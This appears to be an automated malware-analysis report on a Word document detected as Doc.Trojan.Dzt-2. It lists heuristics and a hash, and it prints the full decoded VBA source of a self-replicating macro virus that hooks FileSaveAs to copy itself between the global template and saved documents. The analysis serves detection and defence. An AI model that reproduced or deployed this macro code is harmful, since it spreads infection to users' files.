Malware Insights
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro and a FileSaveAs macro. The AutoOpen macro is designed to execute automatically when the document is opened, and the FileSaveAs macro appears to be involved in copying itself to a global macro storage, potentially to ensure persistence or facilitate further execution. The presence of legacy WordBasic markers and the ClamAV detection further confirm its malicious nature. The primary attack pattern involves leveraging macros to execute malicious code, likely as part of a phishing campaign.
Heuristics 4
- ClamAV: Doc.Trojan.Dzt-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Dzt-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7166 bytes |

SHA-256: 1d7849b744b054a5231508e126ac5996183889f5329f216fe819a66753742aca
Detection: ClamAV: Doc.Trojan.Dzt-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FileSaveAs"
Dim FileBaru$, FileMacro$
Dim salah
Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves a copy of the document in a separate file"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
FileBaru$ = ""
FileMacro$ = ""
salah = 0
WordBasic.DisableInput (1)
WordBasic.DisableAutoMacros (1)
On Error GoTo -1: On Error GoTo CekError
FileMacro$ = WordBasic.[MacroFileName$]()
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
FileBaru$ = WordBasic.[FileName$]()
CopyToFile
If salah <> 0 Then CopyToGlobal
Aksi
WordBasic.FileSaveAs dlg
GoTo Selesai
CekError:
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
Selesai:
End Sub
Private Sub CopyToFile()
On Error GoTo -1: On Error GoTo finish
CekCopyToFile
If salah = 0 Then
CopyAOF
End If
finish:
End Sub
Private Sub CekCopyToFile()
On Error GoTo -1: On Error GoTo fin
WordBasic.MacroCopy "Global:FileSaveAs", FileBaru$ + ":FileSaveAs", 1
fin:
salah = Err.Number
End Sub
Private Sub CopyToGlobal()
On Error GoTo -1: On Error GoTo fin
CopyAOtoG
WordBasic.MacroCopy FileMacro$ + ":FileSaveAs", "Global:FileSaveAs", 1
fin:
salah = Err.Number
End Sub
Private Sub CopyAOtoG()
On Error GoTo -1: On Error GoTo finish
WordBasic.MacroCopy FileMacro$ + ":AutoOpen", "Global:FileSave", 1
finish:
End Sub
Private Sub CopyAOF()
On Error GoTo -1: On Error GoTo finish
WordBasic.MacroCopy "Global:FileSave", FileBaru$ + ":AutoOpen", 1
finish:
End Sub
Private Sub Aksi()
On Error GoTo -1: On Error GoTo finish
WordBasic.FileSummaryInfo Comments:="DZT'96" + Chr(13) + "(c)9 April 1996 by Hikmat S/D0E94328" + Chr(13) + "comp. dept. of HFT" + Chr(13) + "Instrumentasi Elektronika" + Chr(13) + "MIPA Terapan Fakultas MIPA" + Chr(13) + "Universitas Padjadjaran" + Chr(13) + "Bandung"
finish:
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /opt/analyzer/scan_staging/6c8c508aa5cc43e1bfd84b4d071759d9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/FileSaveAs - 4279 bytes
' Line #0:
' Line #1:
' Dim
' VarDefn FileBaru
' VarDefn FileMacro
' Line #2:
' Dim
' VarDefn salah
' Line #3:
' Line #4:
' FuncDefn (Public Sub MAIN())
' Line #5:
' LitStr 0x0000 ""
' St FileBaru$
' Line #6:
' LitStr 0x0000 ""
' St FileMacro$
' Line #7:
' LitDI2 0x0000
' St salah
' Line #8:
' LitDI2 0x0001
' Paren
' Ld WordBasic
' ArgsMemCall DisableInput 0x0001
' Line #9:
' LitDI2 0x0001
' Paren
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #10:
' OnError <crash>
' BoS 0x0000
' OnError CekError
' Line #11:
' Ld WordBasic
' ArgsMemLd [MacroFileName$] 0x0000
' St FileMacro$
' Line #12:
' Dim
' VarDefn dlg (As Object)
' BoS 0x0000
' SetStmt
' LitVarSpecial (False)
' Ld WordBasic
' MemLd DialogRecord
' ArgsMemLd FileSaveAs 0x0001
' Set dlg
' Line #13:
' Ld dlg
' Ld WordBasic
' MemLd CurValues
' ArgsMemCall FileSaveAs 0x0001
' Line #14:
' Ld dlg
' Ld WordBasic
' MemLd Dialog
' ArgsMemCall FileSaveAs 0x0001
' Line #15:
' Ld dlg
' MemLd Format$
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' LitDI2 0x0001
' Ld dlg
' MemSt Format$
' EndIf
' Line #16:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' St FileBaru$
' Line #17:
' ArgsCall CopyToFile 0x0000
' Line #18:
' Ld salah
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' ArgsCall CopyToGlobal 0x0000
' EndIf
' Line #19:
' ArgsCall Aksi 0x0000
' Line #20:
' Ld dlg
' Ld WordBasic
' ArgsMemCall FileSaveAs 0x0001
' Line #21:
' GoTo S
... (truncated)